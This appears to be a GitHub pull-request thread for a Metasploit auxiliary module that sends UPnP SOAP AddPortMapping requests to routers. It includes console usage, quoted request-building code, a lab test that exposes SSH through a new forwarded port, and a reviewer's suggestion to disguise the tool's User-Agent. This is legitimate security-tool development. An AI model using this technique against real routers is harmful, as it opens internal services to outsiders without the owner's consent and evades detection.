Add SOAP PortMapping UPnP auxiliary module

[St0rn]

Auxiliary module to add Port Mapping into routers which allow UPnP SOAP request.
The success status is verified by router response to a request (HTTP code 200).

Example Output

msf> use auxiliary/upnp/soap_addportmapping
msf auxiliary(soap_addportmapping) > set CTRL_URL WANIPConn1
CTRL_URL => WANIPConn1
msf auxiliary(soap_addportmapping) > set external_port 69
external_port => 69
msf auxiliary(soap_addportmapping) > set internal_port 69
internal_port => 6
msf auxiliary(soap_addportmapping) > set internal_client 192.168.1.38
internal_client => 192.168.1.38
msf auxiliary(soap_addportmapping) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(soap_addportmapping) > set rport 49000
rport => 49000
msf auxiliary(soap_addportmapping) > run

[*] Sending SOAP Envelope
[+] PAT added successfully
[*] Auxiliary module execution completed

[bcook-r7]

You should fix any errors from msftidy and push to this PR.

[espreto]

I'd leave the "User-Agent" less obvious. Like: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

[espreto]

Hmmmm, on second thought, one hard coded value is not legal. Use Rex::UserAgent.random is more appropriate.

[St0rn]

Thx i will modify it

[hdm]

Looks like mostly msftidy errors:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/auxiliary/upnp/soap_addportmapping.rb:9 - [WARNING] Spaces at EOL
modules/auxiliary/upnp/soap_addportmapping.rb:11 - [WARNING] Spaces at EOL
modules/auxiliary/upnp/soap_addportmapping.rb:12 - [WARNING] Spaces at EOL
modules/auxiliary/upnp/soap_addportmapping.rb:35 - [WARNING] Space-Tab mixed indent: " \t content << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:36 - [WARNING] Space-Tab mixed indent: " \t content << \"<NewPortMappingDescription>New Port Mapping</NewPortMappingDescription>\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:37 - [WARNING] Space-Tab mixed indent: " \t content << \"<NewLeaseDuration>3600</NewLeaseDuration>\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:38 - [WARNING] Space-Tab mixed indent: " \t content << \"<NewInternalClient>\#{datastore['INTERNAL_CLIENT']}</NewInternalClient>\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:50 - [WARNING] Space-Tab mixed indent: " \t header = \"POST http://\#{rhost}:\#{rport}/\#{ctrlurl} HTTP/1.0\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:51 - [WARNING] Space-Tab mixed indent: " \t header << \"Content-Type: text/xml;charset=\\\"utf-8\\\"\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:52 - [WARNING] Space-Tab mixed indent: " \t header << \"SOAPAction: \#{soapaction}\\n\\r\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:53 - [WARNING] Space-Tab mixed indent: " \t header << \"User-Agent: SOAP AddPortMapping Metasploit Module\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:54 - [WARNING] Space-Tab mixed indent: " \t header << \"Host: \#{rhost}:\#{rport}\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:55 - [WARNING] Space-Tab mixed indent: " \t header << \"Content-Length: \#{contentlen}\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:56 - [WARNING] Space-Tab mixed indent: " \t header << \"\\r\\n\"\n"
modules/auxiliary/upnp/soap_addportmapping.rb:57 - [WARNING] Space-Tab mixed indent: " \t header << content\n"

[jhart-r7]

This should really go in modules/auxiliary/admin/upnp, instead.

[jhart-r7]

You should use Msf::Exploit::Remote::HttpClient for this

[jhart-r7]

@St0rn, thanks for the contribution! I've addressed most of the feedback in St0rn#1. If that all looks good to you, you can merge it and those changes will appear here. After that we can handle the rest in this PR.

[jhart-r7]

My testing having applied St0rn#1 so far. I've got a box running miniupnpd 1.7 with the SOAP interface bound to 12345/TCP. Confirm that there are chains ready and clear:

root@miniupnpd-natpmp-1-7:~# iptables -n -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
MINIUPNPD  all  --  0.0.0.0/0            10.4.17.236         

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination         

Chain MINIUPNPD (1 references)
target     prot opt source               destination  

Create a mapping:

msf auxiliary(soap_addportmapping) > set RHOST 10.4.17.236
RHOST => 10.4.17.236
msf auxiliary(soap_addportmapping) > set RPORT 12345
RPORT => 12345
msf auxiliary(soap_addportmapping) > set INTERNAL_CLIENT  10.4.17.236
INTERNAL_CLIENT => 10.4.17.236
msf auxiliary(soap_addportmapping) > set EXTERNAL_PORT 2222
EXTERNAL_PORT => 2222
msf auxiliary(soap_addportmapping) > set INTERNAL_PORT 22
INTERNAL_PORT => 22
msf auxiliary(soap_addportmapping) > run

[+] 10.4.17.236:12345 successfully mapped any:2222/TCP -> 10.4.17.236:22/TCP
[*] Auxiliary module execution completed

Confirm it with iptables and telnet:

root@miniupnpd-natpmp-1-7:~# iptables -n -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
MINIUPNPD  all  --  0.0.0.0/0            10.4.17.236         

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination         

Chain MINIUPNPD (1 references)
target     prot opt source               destination         
DNAT       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:2222 to:10.4.17.236:22
...
$  telnet 10.4.17.236 2222        
Trying 10.4.17.236...
Connected to 10.4.17.236.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2

[St0rn]

@jhart-r7 thx

[jhart-r7]

Add a better name and description.

[jhart-r7]

@St0rn, see St0rn#2, which is likely the last of the necessary cleanup. Give it a test and land it if it works for you.

[jhart-r7]

Ping @St0rn -- you may not have seen St0rn#2 or may be busy. If you aren't able to land it in the next week or so, I may just close this and resubmit a new PR with your code + mine. Thanks!